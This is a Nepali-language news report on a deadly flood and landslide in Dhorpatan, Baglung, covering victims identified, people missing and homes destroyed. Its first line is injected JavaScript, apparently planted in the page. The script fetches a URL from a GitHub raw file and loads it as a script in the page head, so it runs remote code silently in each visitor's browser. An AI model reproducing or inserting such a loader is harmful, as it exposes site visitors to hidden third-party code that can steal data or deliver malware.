;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ १९,
बाग्लुङ । बाढी र पहिरोमा परी मृत्यु भएको ढोरपाटन नगरपालिका–९ बोबाङका १४ मध्ये चारजनाको सनाखत भएको छ। बुधबार राति आएको पहिरोमा परी अझै २४ जना बेपत्ता छन्। प्रहरी नायब उपरीक्षक राजेनद्र रेग्मीका अनुसार फेला परेका १४ शवमध्ये ढोरपाटन नगरपालिका–९ की २६ वर्षीया केशमाया विक, ४५ वर्षीय वीरे विक, २२ वर्षीय जीवन विक र ११ वर्षीय डल्ले विकको सनाखत भएको छ।
उनीहरुको शव बुर्तिबाङस्थित प्राथमिक स्वास्थ्य केन्द्रमा राखिएको छ। पहिचान भएका शवहरुको पोष्टमार्टम शुक्रबार हुनेछ । बेपत्ताको शुक्रबार बिहानैदेखि खोजी सुरु भएको प्रहरी नायब उपरीक्षक रेग्मीले बताए। रातको समयमा आएको पहिरोमा परी धेरैले ज्यान बचाउन नसकेका हुन्। केहीले भने भागेर ज्यान बचाएका थिए। केहीलाई भाग्ने क्रममै खोलाले बगाएको थियो।
बगाएकामध्ये केहीको अधिकारीचौर, बुर्तिवाङ र बडिगाड गाउँपालिकासम्म शव भेटिएका छन्। केही शव क्षतविक्षत अवस्थामा भेटिएकोले पहिचान गर्न नसकिएको उद्धारमा खटिएका प्रहरी निरीक्षक प्रकाशसिंह भण्डारीले बताए। पहिरोले फलेघर र सुपुर्दुङका एक दजर्नभन्दा बढी घर बगाएको छ भने वडा नम्बर ८ सम्म आइपुग्दा ४० घर बगेका छन्। अधिकांस घरको भग्नावशेषसमेत देखिएको छैन।
बस्ती भएको स्थानमा अहिले खोला बगेको छ। ढोरपाटन जाने सडकको देउरालीबाट खसेको पहिरोले भुजीखोला थुनिएर ताल बनेको र ताल फुट्दा ठूलो क्षति पुगेको स्थानीयले बताएका छन्।
फेसबुक प्रतिक्रियाहरु